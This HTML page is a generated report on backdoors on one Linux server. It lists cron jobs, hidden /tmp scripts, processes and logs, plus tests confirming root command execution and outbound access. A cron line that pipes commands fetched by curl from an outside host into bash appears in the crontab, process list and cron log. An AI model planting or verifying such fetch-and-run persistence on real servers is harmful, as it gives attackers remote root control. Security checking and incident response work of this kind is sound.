
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Backdoor Status Check Report</title>
    <style>
        body { font-family: 'Segoe UI', Arial, sans-serif; margin: 0; padding: 20px; background: #0a0a0a; color: #e0e0e0; }
        .container { max-width: 1200px; margin: 0 auto; background: #1a1a1a; padding: 30px; border-radius: 10px; box-shadow: 0 0 30px rgba(0,255,0,0.1); }
        h1 { color: #00ff00; text-align: center; border-bottom: 3px solid #00ff00; padding-bottom: 10px; text-shadow: 0 0 10px #00ff00; }
        h2 { color: #00ccff; border-left: 4px solid #00ccff; padding-left: 15px; }
        h3 { color: #ffaa00; }
        .status-found { color: #ff4444; font-weight: bold; }
        .status-not-found { color: #00ff00; font-weight: bold; }
        .status-success { color: #00ff00; font-weight: bold; }
        .status-failed { color: #ff4444; font-weight: bold; }
        .deployment-box { background: #0d1117; padding: 15px; border-radius: 5px; margin: 10px 0; border-left: 4px solid #00ccff; }
        .evidence-box { background: #1a0d0d; padding: 15px; border-radius: 5px; margin: 10px 0; border-left: 4px solid #ff4444; }
        .test-box { background: #0d1a0d; padding: 15px; border-radius: 5px; margin: 10px 0; border-left: 4px solid #00ff00; }
        .analysis-box { background: #1a1a0d; padding: 15px; border-radius: 5px; margin: 10px 0; border-left: 4px solid #ffaa00; }
        .code-block { background: #0a0a0a; padding: 15px; border-radius: 5px; font-family: 'Courier New', monospace; overflow-x: auto; border: 1px solid #333; }
        table { width: 100%; border-collapse: collapse; margin: 15px 0; }
        th, td { border: 1px solid #333; padding: 12px; text-align: left; }
        th { background-color: #2a2a2a; font-weight: bold; color: #00ff00; }
        .summary { background: linear-gradient(135deg, #4d0a0a 0%, #1a1a1a 100%); color: #e0e0e0; padding: 20px; border-radius: 10px; margin: 20px 0; border: 1px solid #ff0000; }
        .risk-indicator { color: #ff0000; font-weight: bold; font-size: 1.2em; }
        .progress-bar { width: 100%; height: 20px; background: #333; border-radius: 10px; overflow: hidden; }
        .progress-fill { height: 100%; background: #ff0000; width: 72.2%; transition: width 0.3s ease; }
    </style>
</head>
<body>
    <div class="container">
        <h1>🔍 Backdoor Status Check Report</h1>
        
        <div class="summary">
            <h2>📊 Status Summary</h2>
            <p><strong>Target server:</strong> 101.37.80.173</p>
            <p><strong>Check time:</strong> 2025-10-13 01:50:53</p>
            <p><strong>Risk level:</strong> <span class="risk-indicator">Critical</span></p>
            <p><strong>Risk score:</strong> <span class="risk-indicator">72.2%</span></p>
            <div class="progress-bar">
                <div class="progress-fill"></div>
            </div>
        </div>
        
        <h2>🎯 Backdoor Deployment Status</h2>
        <div class="deployment-box">

            <p><strong>Cron job backdoor:</strong> <span class="status-found">Found</span></p>
            <p><em>Checking scheduled tasks in crontab</em></p>
            <div class="code-block">*/10 * * * * /tmp/.maintenance.sh >/dev/null 2>&1
*/10 * * * * /tmp/.maintenance.sh >/dev/null 2>&1

*/5 * * * * /tmp/.system_callback.sh >/dev/null 2>&1

*/10 * * * * /usr/bin/curl -s http://140.150.236.199:8080/cmd | /bin/bash</div>

            <p><strong>Hidden files:</strong> <span class="status-found">Found</span></p>
            <p><em>Checking hidden files</em></p>
            <div class="code-block">/tmp/.ssh_tunnel_key
/tmp/.env_backdoor.sh
/tmp/.maintenance.sh
/tmp/.system_callback.sh
/tmp/.ssh_tunnel_key.pub
/tmp/.system_callback.log
/tmp/.system_update.sh</div>

            <p><strong>Suspicious processes:</strong> <span class="status-found">Found</span></p>
            <p><em>Checking suspicious processes</em></p>
            <div class="code-block">root         555  0.0  0.4  32264 18692 ?        Ss   00:31   0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
root         663  0.0  0.5 110524 20968 ?        Ssl  00:31   0:00 /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal
root        1941  0.0  0.0   9492  3388 ?        Ss   01:05   0:00 /bin/bash /usr/local/bin/system-maintenance
root        2129  0.0  0.0   9492  3284 ?        S    01:18   0:00 /bin/bash /tmp/.system_update.sh
root        2614  0.0  0.0   9492   232 ?        S    01:49   0:00 /bin/bash /tmp/.system_update.sh
root        2620  0.0  0.0   2608   528 ?        Ss   01:50   0:00 /bin/sh -c /usr/bin/curl -s http://140.150.236.199:8080/cmd | /bin/bash
root        2621  0.0  0.2  27404 10804 ?        S    01:50   0:00 /usr/bin/curl -s http://140.150.236.199:8080/cmd
root        2622  0.0  0.0   9492  1016 ?        S    01:50   0:00 /bin/bash
root        2629  0.0  0.0   9492   240 ?        S    01:50   0:00 /bin/bash /tmp/.system_callback.sh</div>

            <p><strong>Network listeners:</strong> <span class="status-found">Found</span></p>
            <p><em>Checking listening network ports</em></p>
            <div class="code-block">tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      441/systemd-resolve 
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      715/sshd: /usr/sbin 
tcp6       0      0 :::22                   :::*                    LISTEN      715/sshd: /usr/sbin</div>

            <p><strong>Recent connections:</strong> <span class="status-not-found">Not found</span></p>
            <p><em>Checking connections on specific ports</em></p>
            

        </div>
        
        <h2>🕵️ Activity Evidence</h2>
        <div class="evidence-box">

            <h3>Cron execution log</h3>
            <p><strong>Status:</strong> <span class="status-found">Evidence found</span></p>
            <p><em>Checking cron execution records</em></p>
            <div class="code-block">Oct 13 01:50:01 hello CRON[2620]: (root) CMD (/usr/bin/curl -s http://140.150.236.199:8080/cmd | /bin/bash)
Oct 13 01:50:01 hello CRON[2623]: (root) CMD (/tmp/.maintenance.sh >/dev/null 2>&1)
Oct 13 01:50:01 hello CRON[2624]: (root) CMD (/tmp/.system_callback.sh >/dev/null 2>&1)
Oct 13 01:50:01 hello CRON[2631]: (root) CMD (/tmp/.maintenance.sh >/dev/null 2>&1)
Oct 13 01:50:37 hello crontab[2675]: (root) LIST (root)</div>

            <h3>Network connection history</h3>
            <p><strong>Status:</strong> <span class="status-not-found">No evidence found</span></p>
            <p><em>Checking suspicious network connections</em></p>
            

            <h3>Command execution history</h3>
            <p><strong>Status:</strong> <span class="status-not-found">No evidence found</span></p>
            <p><em>Checking suspicious command history</em></p>
            

            <h3>System load</h3>
            <p><strong>Status:</strong> <span class="status-found">Evidence found</span></p>
            <p><em>Checking system resource usage</em></p>
            <div class="code-block">01:50:45 up  1:19,  0 users,  load average: 0.00, 0.00, 0.00
              total        used        free      shared  buff/cache   available
Mem:          3.7Gi       133Mi       2.8Gi       2.0Mi       737Mi       3.3Gi
Swap:            0B          0B          0B
Filesystem      Size  Used Avail Use% Mounted on
udev            1.9G     0  1.9G   0% /dev
tmpfs           376M  724K  376M   1% /run
/dev/vda3        40G  3.0G   35G   8% /
tmpfs           1.9G     0  1.9G   0% /dev/shm</div>

            <h3>Recent logins</h3>
            <p><strong>Status:</strong> <span class="status-found">Evidence found</span></p>
            <p><em>Checking recent login records</em></p>
            <div class="code-block">reboot   system boot  5.4.0-216-generi Mon Oct 13 00:31   still running

wtmp begins Wed Jun 25 17:09:55 2025</div>

            <h3>Authentication log</h3>
            <p><strong>Status:</strong> <span class="status-found">Evidence found</span></p>
            <p><em>Checking authentication activity</em></p>
            <div class="code-block">Oct 13 01:50:01 hello CRON[2616]: pam_unix(cron:session): session opened for user root by (uid=0)
Oct 13 01:50:01 hello CRON[2619]: pam_unix(cron:session): session opened for user root by (uid=0)
Oct 13 01:50:01 hello CRON[2617]: pam_unix(cron:session): session opened for user root by (uid=0)
Oct 13 01:50:01 hello CRON[2618]: pam_unix(cron:session): session opened for user root by (uid=0)
Oct 13 01:50:01 hello CRON[2619]: pam_unix(cron:session): session closed for user root
Oct 13 01:50:01 hello CRON[2618]: pam_unix(cron:session): session closed for user root
Oct 13 01:50:01 hello CRON[2617]: pam_unix(cron:session): session closed for user root
Oct 13 01:50:37 hello sshd[2646]: Accepted password for root from 112.243.79.62 port 51591 ssh2
Oct 13 01:50:37 hello sshd[2646]: pam_unix(sshd:session): session opened for user root by (uid=0)
Oct 13 01:50:37 hello systemd-logind[572]: New session 40 of user root.</div>

        </div>
        
        <h2>🧪 Functional Test Results</h2>
        <div class="test-box">

            <h3>Cron job execution test</h3>
            <p><strong>Result:</strong> <span class="status-success">Success</span></p>
            <p><em>Testing command execution capability</em></p>
            <div class="code-block">test_execution_$(date)</div>

            <h3>Network connectivity test</h3>
            <p><strong>Result:</strong> <span class="status-success">Success</span></p>
            <p><em>Testing outbound internet connectivity</em></p>
            <div class="code-block">{
  "origin": "101.37.80.173"
}</div>

            <h3>File operation test</h3>
            <p><strong>Result:</strong> <span class="status-success">Success</span></p>
            <p><em>Testing file operation capability</em></p>
            <div class="code-block">-rw-r--r-- 1 root root 0 Oct 13 01:50 /tmp/test_file_1760291451</div>

            <h3>System information collection</h3>
            <p><strong>Result:</strong> <span class="status-success">Success</span></p>
            <p><em>Testing information collection capability</em></p>
            <div class="code-block">root
uid=0(root) gid=0(root) groups=0(root)
/root</div>

        </div>
        
        <h2>📊 Usage Pattern Analysis</h2>
        <div class="analysis-box">
            <h3>Deployment status analysis</h3>
            <p><strong>Backdoors deployed:</strong> 4</p>
            <p><strong>Total checks:</strong> 5</p>
            <p><strong>Deployment rate:</strong> 80.0%</p>
            <p><strong>Deployment status:</strong> High</p>
            <h3>Activity evidence analysis</h3>
            <p><strong>Evidence items found:</strong> 4</p>
            <p><strong>Total evidence checks:</strong> 6</p>
            <p><strong>Evidence rate:</strong> 66.7%</p>
            <p><strong>Activity status:</strong> High</p>
            <h3>Functional test analysis</h3>
            <p><strong>Successful tests:</strong> 4</p>
            <p><strong>Total tests:</strong> 4</p>
            <p><strong>Success rate:</strong> 100.0%</p>
            <p><strong>Functional status:</strong> High</p>
            <h3>Usage frequency assessment</h3>
            <p><strong>Usage indicators:</strong> 1</p>
            <p><strong>Frequency assessment:</strong> Moderate usage</p>
            <p><strong>Usage status:</strong> Partially active</p>
        </div>
        
        <div class="evidence-box">
            <h3>🚨 Overall Assessment</h3>
            <p><strong>Risk level:</strong> <span class="risk-indicator">Critical</span></p>
            <p><strong>Risk score:</strong> <span class="risk-indicator">72.2%</span></p>
            <p><strong>Risk status:</strong> Backdoor is highly active; a serious security threat is present</p>
            <p><strong>Total score:</strong> 13/18</p>
        </div>
        
        <footer style="text-align: center; margin-top: 40px; padding-top: 20px; border-top: 1px solid #333; color: #666;">
            <p>Report generated: 2025-10-13 01:51:10</p>
            <p>Backdoor Status Check Tool - for authorized security testing only</p>
        </footer>
    </div>
</body>
</html>
